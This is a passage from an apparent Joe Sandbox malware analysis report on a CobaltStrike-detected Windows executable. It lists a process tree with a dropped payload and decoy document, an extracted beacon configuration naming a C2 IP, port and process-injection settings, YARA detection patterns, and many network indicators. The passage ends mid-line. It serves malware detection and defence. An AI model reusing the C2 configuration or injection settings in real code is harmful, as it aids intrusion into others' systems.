Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1a#U77e5.exe

Overview

General Information

Sample Name:1a#U77e5.exe
Analysis ID:679126
MD5:3f2202e24ad0a66c08f88a18dd7b5fb4
SHA1:62df51eb1351279afa4dbe5920758d6974427ac9
SHA256:eb94cd39cde6a5270181d6e6788c69a2a90ab2b27f9236c8382e810e4dfead1d
Tags:exe
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Potentially malicious time measurement code found
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality for execution timing, often used to detect debuggers
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 1a#U77e5.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\1a#U77e5.exe" MD5: 3F2202E24AD0A66C08F88A18DD7B5FB4)
    • ????????????.exe (PID: 3016 cmdline: C:\Windows\Temp\????????????.exe 9gb3vbgeng MD5: 84E3D79DA5E503374E61A17351781C14)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5788 cmdline: cmd.exe /c start ?????????????????????.docx MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WINWORD.EXE (PID: 5308 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 1443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "124.221.206.154,/submit.php", "HttpPostUri": "/submit.jsp", "Malleable_C2_Instructions": [], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmpCobaltbaltstrike_Beacon_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
  • 0x0:$s10: TVpBUlVIieVIgewgAAAAS
00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmpCobaltbaltstrike_Beacon_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
  • 0x10:$s10: TVpBUlVIieVIgewgAAAAS
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmpHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x3b3ae:$xs1: WS2_32.dll
  • 0x3b8a1:$xs2: ReflectiveLoader
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmpTrojan_Raw_Generic_4unknownFireEye
  • 0x17b4b:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 0F F3 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ...
  • 0x16f0e:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmpCobaltStrike_Sleep_Decoder_IndicatorDetects CobaltStrike sleep_mask decoderyara@s3c.za.net
  • 0x10a48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
Click to see the 48 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
3.2.????????????.exe.25bf8a60000.2.raw.unpackHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x3a3ae:$xs1: WS2_32.dll
  • 0x3a8a1:$xs2: ReflectiveLoader
3.2.????????????.exe.25bf8a60000.2.raw.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
  • 0x3a8a1:$x1: ReflectiveLoader
3.2.????????????.exe.25bf8a60000.2.raw.unpackCobaltbaltstrike_Beacon_x64Detects CobaltStrike payloadsAvast Threat Intel Team
  • 0x0:$h01: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 89
  • 0x3aa30:$h13: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2B 8D 2E
3.2.????????????.exe.25bf8a60000.2.raw.unpackCobaltStrike_Sleep_Decoder_IndicatorDetects CobaltStrike sleep_mask decoderyara@s3c.za.net
  • 0xfe48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
3.2.????????????.exe.25bf8a60000.2.raw.unpackCobaltStrike_C2_Encoded_XOR_Config_IndicatorDetects CobaltStrike C2 encoded profile configurationyara@s3c.za.net
  • 0x3aa30:$s046: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2B 8D 2E 2D 2E 2C 2E 2A 2E 2E C4 4E 2E 2A 2E 2C 2E 2A 2E 3E 2E 2E 2E 2B 2E 2F 2E 2C 2E 2E
Click to see the 59 entries

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: 1a#U77e5.exeVirustotal: Detection: 61%Perma Link
Source: 1a#U77e5.exeMetadefender: Detection: 22%Perma Link
Source: 1a#U77e5.exeReversingLabs: Detection: 76%
Antivirus / Scanner detection for submitted sample
Source: 1a#U77e5.exeAvira: detected
Antivirus detection for URL or domain
Source: https://124.221.206.154:1443/ubmit.phpnAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/ubmit.phpAvira URL Cloud: Label: malware
Source: https://124.221.206.154/n-USAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/Avira URL Cloud: Label: malware
Source: https://124.221.206.154/WAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpoAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpwAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpyAvira URL Cloud: Label: malware
Source: https://124.221.206.154/-Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpxAvira URL Cloud: Label: malware
Source: 124.221.206.154Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/0;Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpIAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpQAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpcAvira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpeAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Windows\Temp\????????????.exeAvira: detection malicious, Label: HEUR/AGEN.1211767
Multi AV Scanner detection for dropped file
Source: C:\Windows\Temp\????????????.exeMetadefender: Detection: 25%Perma Link
Source: C:\Windows\Temp\????????????.exeReversingLabs: Detection: 61%
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 1443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "124.221.206.154,/submit.php", "HttpPostUri": "/submit.jsp", "Malleable_C2_Instructions": [], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 1a#U77e5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Temp\????????????.exeCode function: 4x nop then sub rbx, qword ptr [rax+18h]3_2_0131B1A0
Source: C:\Windows\Temp\????????????.exeCode function: 4x nop then mov r8, 0000800000000000h3_2_01324AC0

Networking

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractorURLs: 124.221.206.154
Source: Joe Sandbox ViewASN Name: JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR
Source: global trafficTCP traffic: 192.168.2.5:49755 -> 124.221.206.154:1443
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: unknownTCP traffic detected without corresponding DNS query: 124.221.206.154
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154/
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154/-
Source: ????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154/W
Source: ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154/n-US
Source: ????????????.exe, 00000003.00000003.680436999.0000025BF36DA000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450674237.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645708761.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546244712.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472618349.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515410872.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707824461.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507054004.0000025BF36D1000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565779330.0000025BF36CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/
Source: ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/(
Source: ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/0;
Source: ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/9.0;
Source: ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/a
Source: ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/e
Source: ????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/l
Source: ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.php
Source: ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.php-
Source: ????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.php154:1443/N
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.php3
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.php?
Source: ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpG
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 